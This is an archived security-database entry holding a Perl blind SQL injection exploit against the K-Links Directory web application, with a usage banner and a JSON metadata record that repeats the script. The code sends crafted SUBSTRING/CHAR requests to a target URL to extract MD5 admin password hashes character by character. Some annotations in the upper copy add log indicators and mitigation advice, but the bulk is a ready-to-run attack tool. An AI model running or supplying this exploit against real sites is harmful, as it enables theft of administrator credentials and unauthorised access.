ID SECURITYVULNS:DOC:20326
Type securityvulns
Reporter Securityvulns
Modified 2008-08-12T00:00:00
Description
!/usr/bin/perl
K-Links Directory Blind SQL Injection Exploit
..::virangar security team::..
www.virangar.net
C0d3d BY:virangar security team ( hadihadi )
special tnx to:
MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra
& all virangar members & all hackerz
my lovely friends hadi_aryaie2004 & arash(imm02tal)
..:::Young Iranina Hackerz::..
use HTTP::Request;
use LWP::UserAgent;
# Driver: takes a target URL and a mode number from the command line, maps the
# mode to a table/column pair, and runs the extraction loop in halghe().
# The values are stored in package globals ($host, $tbl, $col) that halghe()
# reads directly.
# Defender context: the output is labelled "md5 Password" and the two tables are
# admin tables, so a site whose logs show this traffic should treat its stored
# admin password hashes as disclosed and rotate those credentials.
if (@ARGV != 2){
# Wrong argument count: print the usage banner.
header();
}
$host = $ARGV[0];
$mod=$ARGV[1];
# Mode 1 selects table tbl_admin, column upass.
if($mod==1){
$tbl="tbl_admin";
$col="upass";
}
# Mode 2 selects table platinum_admins.
elsif($mod==2){
$tbl="platinum_admins";
$col="a_apss";
}
# Any other mode value: report it and stop.
else{
print "\nyour option not true\n";
exit;
}
# The recovered characters are written to STDOUT by halghe() between these two prints.
print "\n md5 Password:\r\n";
&halghe();
print "\n[+]Done\n";
# halghe: walks character positions 1..32 of the selected column value and, for
# each position, passes candidate character codes to inject() until one is accepted.
# Candidates are ASCII 48-57 ('0'-'9') first, then 97-102 ('a'-'f'): the lowercase
# hex alphabet, consistent with the 32-character "md5 Password" label printed by
# the caller. Accepted characters are written to STDOUT one at a time.
# Detection note: each position costs up to 16 sequential GET requests (up to 512
# for a full run) whose URLs differ only in the position and character-code
# numbers. That burst of near-identical requests from one client is visible in
# web access logs and is a reasonable basis for rate limiting or alerting.
sub halghe {
for($i = 1; $i <= 32; $i++){
# $f is the "found" flag for this position; $n is the candidate character code.
$f = 0;
$n = 48;
# First pass: digits '0'..'9'.
while(!$f && $n <= 57)
{
if(&inject($host ,$tbl ,$col ,$i, $n,)){
$f = 1;
syswrite(STDOUT, chr($n), 1);
}
$n++;
}
# Second pass, only if no digit was accepted: letters 'a'..'f'.
if(!$f){
$n=97;
while(!$f && $n <= 102)
{
if(&inject($host ,$tbl ,$col ,$i, $n,)){
$f = 1;
syswrite(STDOUT, chr($n), 1);
}
$n++;
}}
}
}
# inject: sends one probe request and reports whether the response looked error-free.
# Positional arguments: target URL, table name, column name, character position,
# candidate character code.
# Returns 1 when the response body contains neither of the two MySQL error strings
# tested below; otherwise no explicit return statement is executed.
sub inject {
my $site = $[0];
my $tl = $ [1];
my $cl = $[2];
my $a = $ [3];
my $b = $_[4];
# The probe is the target URL with a boolean condition appended: SUBSTRING() over a
# one-row sub-select, compared with CHAR(code), followed by a "/*" comment opener.
# NOTE(review): for this to reach the SQL parser, the application presumably places
# the id segment of the report URL into a query without binding it as a parameter or
# validating it as an integer. That is inferred from the script; the vulnerable
# code is not shown on this page.
# Mitigation: bind the id as a query parameter or cast it to an integer before use.
# Log/WAF indicator: request paths containing "%20and%20substring((select" or
# ending in "/*".
$attack= "$site"."%20and%20substring((select%20"."$cl"."%20from%20$tl%20limit%200,1),"."$a".",1)=char("."$b".")/*";
# $b is reused from here on for the user-agent object; the character code was
# already interpolated into $attack above.
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
# Fixed User-Agent string, identical on every probe. It is useful for correlating
# requests in logs, but it imitates an ordinary browser and is weak as a sole indicator.
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$req = $b->request(HTTP::Request->new(GET=>$attack));
$res = $req->content;
# The decision depends on MySQL error text appearing in the page body. Not echoing
# database errors to clients removes this signal but does not fix the underlying
# query construction.
if ($res !~ m/You have an error in your SQL syntax;/i and $res !~ m/Table.*doesn't exist/i ){
return 1;
}
}
# header: prints the usage banner to STDOUT. The text is a qq{} string, so $0
# interpolates to the name the script was invoked as. It lists the two mode
# numbers and the expected form of the target URL (the report link including its id).
sub header {
print qq{
K-Links Directory Blind SQL Injection Exploit
www.virangar.net
Useage: perl $0 Host option
option: 1 [table=tbl_admin & column=upass]
2 [table=platinum_admins & column=a_pass]
Host: full patch to Report Link+id (dont forget http://)
Example:
perl $0 http://site.com/report/1 2
};
}
{"id": "SECURITYVULNS:DOC:20326", "bulletinFamily": "software", "title": "K-Links Directory Blind SQL Injection Exploit", "description": "#!/usr/bin/perl \r\n###########################################################################\r\n# K-Links Directory Blind SQL Injection Exploit #\r\n# ..::virangar security team::.. #\r\n# www.virangar.net #\r\n# C0d3d BY:virangar security team ( hadihadi ) #\r\n#special tnx to: #\r\n#MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra #\r\n#& all virangar members & all hackerz #\r\n# my lovely friends hadi_aryaie2004 & arash(imm02tal) #\r\n# ..:::Young Iranina Hackerz::.. #\r\n###########################################################################\r\n\r\n\r\nuse HTTP::Request;\r\nuse LWP::UserAgent;\r\n\r\nif (@ARGV != 2){\r\nheader();\r\n}\r\n\r\n$host = $ARGV[0];\r\n$mod=$ARGV[1];\r\nif($mod==1){\r\n$tbl="tbl_admin";\r\n$col="upass";\r\n}\r\nelsif($mod==2){\r\n$tbl="platinum_admins";\r\n$col="a_apss";\r\n}\r\nelse{\r\nprint "\nyour option not true\n";\r\nexit;\r\n}\r\n\r\nprint "\n md5 Password:\r\n";\r\n&halghe();\r\nprint "\n[+]Done\n";\r\n\r\n\r\nsub halghe {\r\nfor($i = 1; $i <= 32; $i++){\r\n $f = 0;\r\n $n = 48;\r\n while(!$f && $n <= 57)\r\n {\r\n if(&inject($host ,$tbl ,$col ,$i, $n,)){\r\n $f = 1;\r\n syswrite(STDOUT, chr($n), 1);\r\n }\r\n$n++;\r\n}\r\nif(!$f){ \r\n$n=97;\r\nwhile(!$f && $n <= 102)\r\n {\r\n if(&inject($host ,$tbl ,$col ,$i, $n,)){\r\n $f = 1;\r\n syswrite(STDOUT, chr($n), 1);\r\n }\r\n$n++;\r\n}}\r\n}\r\n}\r\nsub inject {\r\nmy $site = $_[0];\r\nmy $tl = $_[1];\r\nmy $cl = $_[2];\r\nmy $a = $_[3];\r\nmy $b = $_[4];\r\n\r\n\r\n$attack= "$site"."%20and%20substring((select%20"."$cl"."%20from%20$tl%20limit%200,1),"."$a".",1)=char("."$b".")/*";\r\n\r\n$b = LWP::UserAgent->new() or die "Could not initialize browser\n";\r\n$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');\r\n$req = $b->request(HTTP::Request->new(GET=>$attack));\r\n$res = $req->content;\r\n\r\nif ($res !~ m/You have an 
error in your SQL syntax;/i and $res !~ m/Table.*doesn't exist/i ){\r\n return 1;\r\n}\r\n\r\n}\r\nsub header {\r\nprint qq{\r\n###################################################################\r\n# K-Links Directory Blind SQL Injection Exploit #\r\n# www.virangar.net #\r\n# Useage: perl $0 Host option #\r\n# option: 1 [table=tbl_admin & column=upass] #\r\n# 2 [table=platinum_admins & column=a_pass] #\r\n# #\r\n# Host: full patch to Report Link+id (dont forget http://) #\r\n# #\r\n# Example: #\r\n# perl $0 http://site.com/report/1 2 #\r\n# #\r\n###################################################################\r\n};\r\n}", "published": "2008-08-12T00:00:00", "modified": "2008-08-12T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20326", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:27", "edition": 1, "viewCount": 8, "enchantments": {"score": {"value": 1.6, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9211"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9211"]}]}, "exploitation": null, "vulnersScore": 1.6}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645297354}}
{}